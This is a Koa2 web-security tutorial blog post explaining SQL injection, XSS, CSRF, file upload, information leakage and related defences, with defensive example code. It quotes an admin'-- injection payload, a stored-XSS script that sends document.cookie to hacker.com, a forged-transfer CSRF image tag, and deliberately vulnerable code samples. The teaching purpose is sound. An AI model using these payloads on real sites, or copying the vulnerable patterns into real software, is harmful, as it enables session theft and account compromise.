
Analysis of Common Web Security Threats

Author: Chuan Chen | Reads: 36157 | Category: Node.js

Common Web Security Threat Analysis

Web security threats are critical issues developers must address when building applications. As a lightweight Node.js framework, Koa2 provides a concise middleware mechanism, but developers still need to proactively defend against various attack vectors. Below, we analyze typical threats and defense strategies based on real-world attack scenarios.

SQL Injection Attacks

SQL injection manipulates database query logic by constructing malicious input. Consider a Koa2 login endpoint that builds its query by string concatenation:

const Koa = require('koa');
const app = new Koa();
// db: any database client exposing query(sql, params), e.g. mysql2/promise

app.use(async (ctx) => {
  const username = ctx.query.username;
  const password = ctx.query.password;

  // Dangerous! User input is spliced directly into the SQL text
  const sql = `SELECT * FROM users WHERE username='${username}' AND password='${password}'`;
  const result = await db.query(sql);

  if (result.length > 0) {
    ctx.body = 'Login successful';
  } else {
    ctx.body = 'Authentication failed';
  }
});

When an attacker supplies admin'-- as the username, the SQL becomes:

SELECT * FROM users WHERE username='admin'--' AND password='any_value'

The -- starts a comment, so the password condition is never evaluated and the query matches the admin row regardless of the password entered.

Defense Strategies:

  1. Use parameterized queries, so the driver sends the values separately from the SQL text:
const sql = `SELECT * FROM users WHERE username=? AND password=?`;
await db.query(sql, [username, password]);
  2. Use ORM libraries like Sequelize, which build parameterized queries for you:
User.findOne({ where: { username, password } });
// Query shape only: in practice store a password hash, look the user up by
// username and compare the hash after the lookup
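To make the difference between the concatenated and the parameterized query concrete, here is an added example (not code from the article). It builds both SQL strings for the admin'-- payload and then walks each one the way a SQL engine would, tracking string literals and comments, to count how many WHERE conditions actually survive. The string-level binding in bindParams is an illustration only; real drivers such as mysql2 or pg send parameters separately from the SQL text in prepared statements.

```javascript
'use strict';

// Added example, not code from the article. Real drivers (mysql2, pg) send
// parameters separately from the SQL text; the string-level binding below is an
// illustration that makes the "input as code" vs "input as data" difference visible.
function buildUnsafeLogin(username, password) {
  return `SELECT * FROM users WHERE username='${username}' AND password='${password}'`;
}

// Minimal placeholder binding: each ? receives a quoted literal with embedded
// single quotes doubled, so input can never close the string early.
function bindParams(sql, params) {
  let i = 0;
  return sql.replace(/\?/g, () => {
    if (i >= params.length) throw new Error('missing parameter');
    const v = String(params[i++]);
    return `'${v.replace(/'/g, "''")}'`;
  });
}

function buildSafeLogin(username, password) {
  return bindParams('SELECT * FROM users WHERE username=? AND password=?', [username, password]);
}

// Returns the text the database engine would actually execute: walks the SQL,
// tracks whether it is inside a string literal, and drops a "--" comment that
// begins outside a literal.
function effectiveSql(sql) {
  let out = '';
  let inString = false;
  for (let i = 0; i < sql.length; i++) {
    const c = sql[i];
    if (inString) {
      out += c;
      if (c === "'") {
        if (sql[i + 1] === "'") { out += "'"; i++; } // doubled quote stays in the literal
        else inString = false;
      }
    } else if (c === '-' && sql[i + 1] === '-') {
      break; // everything after -- is a comment
    } else {
      out += c;
      if (c === "'") inString = true;
    }
  }
  return out.trim();
}

// How many AND-joined conditions survive in the executed WHERE clause.
function conditionCount(sql) {
  const where = effectiveSql(sql).split(/\bWHERE\b/i)[1] || '';
  return where.split(/\bAND\b/i).filter((part) => part.trim()).length;
}

// Constructed input: the article's admin'-- username with an arbitrary password.
const payloadUser = "admin'--";
const unsafeSql = buildUnsafeLogin(payloadUser, 'any_value');
const safeSql = buildSafeLogin(payloadUser, 'any_value');

console.log(unsafeSql, '\n  executed conditions:', conditionCount(unsafeSql)); // 1: password check gone
console.log(safeSql, '\n  executed conditions:', conditionCount(safeSql));     // 2: both checks intact
```

Running it shows the concatenated query executing with a single condition (the password check has become part of a comment), while the bound query keeps the payload inside the username literal and both conditions intact.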

XSS (Cross-Site Scripting) Attacks

Stored XSS example: a user submits a comment containing a script which, if the comment is later rendered unescaped, runs in every visitor's browser and sends their cookie to an attacker-controlled host:

<script>fetch('https://hacker.com/steal?cookie='+document.cookie)</script>

Koa2 Defense Measures:

  1. Use koa-helmet to set CSP headers:
const helmet = require('koa-helmet');
app.use(helmet.contentSecurityPolicy({
  directives: {
    defaultSrc: ["'self'"],
    // 'unsafe-inline' permits inline <script> blocks, which is exactly what an
    // injected comment contains; drop it (or use nonces/hashes) for the CSP
    // to actually block injected scripts
    scriptSrc: ["'self'", "'unsafe-inline'"]
  }
}));
  2. Automatic escaping in template engines (e.g., EJS):
<%= userComment %>  <!-- <%= %> escapes special characters; <%- %> outputs raw HTML and must not be used for user input -->
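The two measures above can be checked without a browser. The following added example (not the article's code) implements the escaping an EJS <%= %> tag performs, renders the malicious comment through it, builds the Content-Security-Policy header value from the same camelCase directive object koa-helmet accepts, and runs a small policy review that flags the 'unsafe-inline' entry in the article's policy. The function names are this example's own.

```javascript
'use strict';

// Added example, not code from the article. escapeHtml does what an EJS <%= %>
// tag does: the five characters that can change HTML context become entities.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// A comment rendered through the escaping path: the browser shows the text
// and never parses a <script> element out of it.
function renderComment(userComment) {
  return `<p class="comment">${escapeHtml(userComment)}</p>`;
}

// Build a Content-Security-Policy header value from the camelCase directive
// object koa-helmet accepts (scriptSrc -> script-src).
function buildCsp(directives) {
  return Object.entries(directives)
    .map(([key, values]) => `${key.replace(/[A-Z]/g, (m) => '-' + m.toLowerCase())} ${values.join(' ')}`)
    .join('; ');
}

// Policy review: 'unsafe-inline' in the effective script source lets an injected
// inline <script> run, which is the case the CSP was meant to block.
function cspWeaknesses(directives) {
  const findings = [];
  const scriptSrc = directives.scriptSrc || directives.defaultSrc || [];
  if (scriptSrc.includes("'unsafe-inline'")) findings.push("script-src allows 'unsafe-inline'");
  if (scriptSrc.includes('*')) findings.push('script-src allows any origin');
  if (!directives.defaultSrc) findings.push('no default-src fallback');
  return findings;
}

// Constructed sample: the stored-XSS comment quoted in the article.
const maliciousComment = "<script>fetch('https://hacker.com/steal?cookie='+document.cookie)</script>";
const renderedComment = renderComment(maliciousComment);

// The article's policy next to a stricter one without inline scripts.
const articlePolicy = { defaultSrc: ["'self'"], scriptSrc: ["'self'", "'unsafe-inline'"] };
const strictPolicy = { defaultSrc: ["'self'"], scriptSrc: ["'self'"] };

console.log(renderedComment);
console.log(buildCsp(articlePolicy), cspWeaknesses(articlePolicy));
console.log(buildCsp(strictPolicy), cspWeaknesses(strictPolicy));
```

The rendered comment contains &lt;script&gt; rather than a script element, and the review reports exactly one weakness for the article's policy and none for the strict one.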

CSRF (Cross-Site Request Forgery)

An attacker embeds a request to your site in a page they control; the victim's browser sends it automatically, with the victim's cookies attached:

<img src="https://your-site.com/transfer?to=hacker&amount=10000">

Koa2 Solutions:

  1. Use koa-csrf middleware (it keeps its secret in ctx.session, so koa-session and a body parser must be registered before it):
const session = require('koa-session');
const bodyParser = require('koa-bodyparser');
const CSRF = require('koa-csrf');

app.keys = [process.env.SESSION_KEY]; // signs the session cookie
app.use(session(app));
app.use(bodyParser());
app.use(new CSRF({
  invalidTokenMessage: 'Invalid CSRF token',
  invalidTokenStatusCode: 403
}));

// Forms must include the _csrf field; koa-csrf checks it on every method except GET/HEAD/OPTIONS
app.use(async (ctx) => {
  ctx.body = `
    <form action="/transfer" method="POST">
      <input type="hidden" name="_csrf" value="${ctx.csrf}">
      <!-- Other fields -->
    </form>
  `;
});

File Upload Vulnerabilities

Insecure file upload handling:

const fs = require('fs');
const multer = require('koa-multer');
const upload = multer({ dest: 'uploads/' });
app.use(upload.single('file'));

app.use(async (ctx) => {
  // No file type validation, and the client-chosen name is used as-is
  // (koa-multer attaches the parsed file to ctx.req.file)
  const file = ctx.req.file;
  fs.renameSync(file.path, `public/${file.originalname}`);
});

Attackers could upload .php files and, if the web server executes scripts from the public directory, run server-side code.

Security Improvements:

const upload = multer({
  limits: { fileSize: 1024 * 1024 },   // reject bodies over 1 MiB
  fileFilter: (req, file, cb) => {
    // file.mimetype comes from the client's own Content-Type and can be forged;
    // treat it as a first filter and verify the stored file's content as well
    const allowedTypes = ['image/jpeg', 'image/png'];
    if (!allowedTypes.includes(file.mimetype)) {
      return cb(new Error('Invalid file type'));
    }
    cb(null, true);
  }
});

Insecure Dependency Packages

Check package.json for potential risks:

  1. Use npm audit to scan for vulnerabilities
  2. Pin exact dependency versions (no ^ or ~ ranges):
"dependencies": {
  "koa": "2.13.4",
  "koa-router": "7.4.0"
}

Information Leakage Issues

Misconfiguration exposing sensitive data:

// Bad practice: send the stack trace to the client
// (Koa passes (err, ctx) to the 'error' event)
app.on('error', (err, ctx) => {
  ctx.body = err.stack;
});

// Correct approach: a top-level error-handling middleware answers the client with
// a generic message; the full error goes only to the server log. By the time
// app.on('error') fires, Koa has already sent the response, so the reply must
// be shaped in middleware, not in the event handler.
app.use(async (ctx, next) => {
  try {
    await next();
  } catch (err) {
    ctx.status = err.status || 500;
    ctx.body = 'Internal Server Error';
    ctx.app.emit('error', err, ctx);
  }
});
app.on('error', (err, ctx) => {
  console.error(err);
});
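The rule behind that fix is a separation of audiences: the client gets a status and a generic body, the log gets everything. The following added example (not the article's code) puts that split into two pure functions, clientResponse and logRecord, wraps them in a Koa-style error boundary, and runs constructed errors through it, including a 500 that was wrongly marked exposable. The expose/status convention it follows is Koa's own (errors from ctx.throw(4xx) carry expose: true); the function names are this example's assumptions.

```javascript
'use strict';

// Added example, not the article's code: the split between what the client sees
// and what the log sees, written as pure functions so it can be checked offline,
// plus the Koa middleware that applies them.

// Koa convention: err.expose is true for errors created via ctx.throw(4xx) and
// false for anything unexpected, whose message may contain internal details.
function clientResponse(err) {
  const status = Number.isInteger(err.status) && err.status >= 400 && err.status < 600 ? err.status : 500;
  const safeToShow = err.expose === true && status < 500;
  return { status, body: safeToShow ? err.message : 'Internal Server Error' };
}

// The debugging detail goes here and only here.
function logRecord(err, ctx) {
  return {
    time: new Date().toISOString(),
    method: ctx.method,
    path: ctx.path,
    ip: ctx.ip,
    status: clientResponse(err).status,
    message: err.message,
    stack: err.stack,
  };
}

// Register this first with app.use() so it wraps every later middleware.
function errorBoundary(logSink) {
  return async (ctx, next) => {
    try {
      await next();
    } catch (err) {
      const res = clientResponse(err);
      ctx.status = res.status;
      ctx.body = res.body;
      logSink.push(logRecord(err, ctx));
    }
  };
}

// Constructed errors: a database failure carrying a host address, a routine 404,
// and a 500 that mistakenly has expose set (it still must not leak).
const dbError = new Error('connect ECONNREFUSED 10.0.0.5:3306');
const notFound = Object.assign(new Error('Not Found'), { status: 404, expose: true });
const exposedServerError = Object.assign(new Error('disk /srv/data full'), { status: 500, expose: true });

// Run the boundary against a fake context without Koa.
const fakeCtx = { method: 'POST', path: '/login', ip: '198.51.100.7' };
const sink = [];
errorBoundary(sink)(fakeCtx, async () => { throw dbError; }).then(() => {
  console.log('client sees:', fakeCtx.status, fakeCtx.body);
  console.log('log has:', sink[0].message, '+ stack of', sink[0].stack.split('\n').length, 'lines');
});
```

The connection string with the internal database address reaches the log record only; the client body for it is the fixed 'Internal Server Error', while the 404 keeps its harmless message.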

Authentication and Session Management

Common pitfalls:

  1. Weak password policies
  2. Session fixation attacks

JWT Security Practices:

const jwt = require('jsonwebtoken');
app.use(async (ctx) => {
  const token = jwt.sign(
    { userId: 123 },
    process.env.JWT_SECRET,                   // read from the environment, never hard-coded
    { expiresIn: '1h', algorithm: 'HS256' }   // short lifetime, explicit algorithm
  );
  // On the verify side pass { algorithms: ['HS256'] } to jwt.verify so the
  // token's own header cannot choose the algorithm.

  ctx.cookies.set('token', token, {
    httpOnly: true,                                // not readable from page scripts
    secure: process.env.NODE_ENV === 'production'  // HTTPS only outside development
    // consider sameSite: 'lax' as well, to keep the cookie off cross-site POSTs
  });
});

Rate Limiting Protection

Limit the request rate per client to slow brute-force attacks (apply a tighter limit to login endpoints than to the site as a whole):

const ratelimit = require('koa-ratelimit');
app.use(ratelimit({
  driver: 'memory',     // in-process store; use 'redis' with a client in db when running several instances
  db: new Map(),
  duration: 60000,      // window length in milliseconds
  max: 100,             // requests allowed per client per window
  disableHeader: false  // keep the X-RateLimit-* headers in responses
}));
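The duration/max semantics above are simple enough to implement and test directly. The following added example (not koa-ratelimit's code) is a fixed-window limiter keyed by client id with an injectable clock, a middleware of the same shape as koa-ratelimit's (429 plus X-RateLimit-* headers), and a prune step for the memory store, which otherwise keeps one entry per client forever. The simulation uses constructed IPs and a fake clock.

```javascript
'use strict';

// Added example: a fixed-window limiter with the duration/max semantics of the
// config above, written so the clock can be injected and the behaviour checked
// offline; koa-ratelimit's own implementation is not reproduced here.
function createRateLimiter({ duration, max, now = () => Date.now() }) {
  const windows = new Map(); // id -> { start, count }
  function check(id) {
    const t = now();
    let w = windows.get(id);
    if (!w || t - w.start >= duration) {
      w = { start: t, count: 0 };
      windows.set(id, w);
    }
    w.count += 1;
    return {
      allowed: w.count <= max,
      remaining: Math.max(0, max - w.count),
      resetMs: w.start + duration - t,
    };
  }
  // The memory driver keeps one entry per client id forever unless pruned;
  // call this periodically in a long-running process.
  function prune() {
    const t = now();
    for (const [id, w] of windows) if (t - w.start >= duration) windows.delete(id);
    return windows.size;
  }
  return { check, prune };
}

// Middleware with the same shape as koa-ratelimit's: 429 plus X-RateLimit-* headers.
function rateLimitMiddleware(limiter, idOf = (ctx) => ctx.ip) {
  return async (ctx, next) => {
    const r = limiter.check(idOf(ctx));
    ctx.set('X-RateLimit-Remaining', String(r.remaining));
    ctx.set('X-RateLimit-Reset', String(Math.ceil(r.resetMs / 1000)));
    if (!r.allowed) {
      ctx.status = 429;
      ctx.body = 'Rate limit exceeded';
      return;
    }
    await next();
  };
}

// Constructed run with a fake clock: 5 requests per minute per client.
function simulate() {
  let clock = 0;
  const limiter = createRateLimiter({ duration: 60000, max: 5, now: () => clock });
  const ip = '198.51.100.7';
  const firstMinute = [];
  for (let i = 0; i < 7; i++) {
    firstMinute.push(limiter.check(ip).allowed);
    clock += 1000;
  }
  const otherClient = limiter.check('203.0.113.9').allowed; // separate bucket, unaffected
  clock += 60000;                                           // past the first client's window
  const afterReset = limiter.check(ip).allowed;
  const remainingEntries = limiter.prune();                 // the idle client's window is dropped
  return { firstMinute, otherClient, afterReset, remainingEntries };
}
console.log(simulate());
```

Requests six and seven in the first window are refused, a different client is unaffected, the first client is admitted again once its window has elapsed, and prune leaves only the one live window in the store.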

HTTP Security Headers Configuration

Enhance security with koa-helmet:

app.use(helmet({
  hsts: { maxAge: 31536000, includeSubDomains: true }, // Strict-Transport-Security: force HTTPS for one year
  xssFilter: true,   // X-XSS-Protection (legacy header; current browsers rely on CSP instead)
  noSniff: true      // X-Content-Type-Options: nosniff, so responses are not MIME-sniffed
}));

Logging and Monitoring

Record critical security events:

// securityLogger: any logger with a warn() method; a console-based fallback is shown here
const securityLogger = { warn: (msg) => console.warn(msg) };

app.use(async (ctx, next) => {
  const start = Date.now();
  await next();
  const ms = Date.now() - start;

  console.log(`${ctx.method} ${ctx.url} - ${ms}ms`);
  if (ctx.status >= 400) {
    securityLogger.warn(`Suspicious request: ${ctx.ip} ${ctx.status}`);
  }
});
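A security log is only useful if something reads it back. The following added example (not the article's code) writes one JSON object per line, so a SIEM can parse it without guessing, and then runs a detector over a constructed log that flags any client producing five or more 401/403 responses inside a sliding sixty-second window, the pattern a password-guessing attempt leaves behind. The IPs, timestamps and function names are this example's own constructions.

```javascript
'use strict';

// Added example, not the article's code. The logger writes one JSON object per
// line (easy for a SIEM to parse), and the detector reads such lines back and
// flags clients that fail authentication repeatedly within a short window.
function securityEvent(ctx, ms, ts = new Date()) {
  return JSON.stringify({ ts: ts.toISOString(), ip: ctx.ip, method: ctx.method, path: ctx.path, status: ctx.status, ms });
}

// Reports an IP as soon as `threshold` 401/403 responses fall inside `windowMs`.
function detectAuthFailureBursts(lines, { threshold = 5, windowMs = 60000 } = {}) {
  const failuresByIp = new Map();
  for (const line of lines) {
    let ev;
    try { ev = JSON.parse(line); } catch { continue; } // skip lines that are not ours
    if (ev.status !== 401 && ev.status !== 403) continue;
    const t = Date.parse(ev.ts);
    if (Number.isNaN(t)) continue;
    if (!failuresByIp.has(ev.ip)) failuresByIp.set(ev.ip, []);
    failuresByIp.get(ev.ip).push(t);
  }
  const alerts = [];
  for (const [ip, times] of failuresByIp) {
    times.sort((a, b) => a - b);
    let lo = 0; // sliding window over sorted timestamps
    for (let hi = 0; hi < times.length; hi++) {
      while (times[hi] - times[lo] > windowMs) lo++;
      if (hi - lo + 1 >= threshold) {
        alerts.push({
          ip,
          count: hi - lo + 1,
          from: new Date(times[lo]).toISOString(),
          to: new Date(times[hi]).toISOString(),
        });
        break;
      }
    }
  }
  return alerts;
}

// Constructed log: one client failing login six times in 25 s, one client with
// a single failure and normal traffic, and a stray non-JSON line.
const base = Date.parse('2024-05-01T10:00:00Z');
const at = (ip, status, offsetSec, path = '/login') =>
  securityEvent({ ip, method: 'POST', path, status }, 12, new Date(base + offsetSec * 1000));
const sampleLog = [
  at('198.51.100.7', 401, 0), at('198.51.100.7', 401, 5), at('198.51.100.7', 401, 9),
  at('198.51.100.7', 401, 14), at('198.51.100.7', 401, 20), at('198.51.100.7', 401, 25),
  at('203.0.113.9', 401, 3), at('203.0.113.9', 200, 8), at('203.0.113.9', 200, 30, '/account'),
  'not a json line',
];
const alerts = detectAuthFailureBursts(sampleLog);
console.log(alerts);
```

The detector raises one alert, for the client that reached five failures within twenty seconds, and stays quiet for the client with a single failure; tightening the window to ten seconds makes the same log produce no alert, which is the knob to tune against your own login traffic.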

Some of the content on this site comes from the internet; all copyrights belong to the source site or the original author.

If your rights have been infringed, please email us and we will remove the content. Email: cc@cccx.cn

Front End Chuan

Front End Chuan, Chen Chuan's Code Teahouse 🍵, specializing in exorcising all kinds of stubborn bugs 💻. Daily serving baldness-warning-level development insights 🛠️, with a bonus of one-liners that'll make you laugh for ten years 🐟. Occasionally drops pixel-perfect romance brewed in a coffee cup ☕.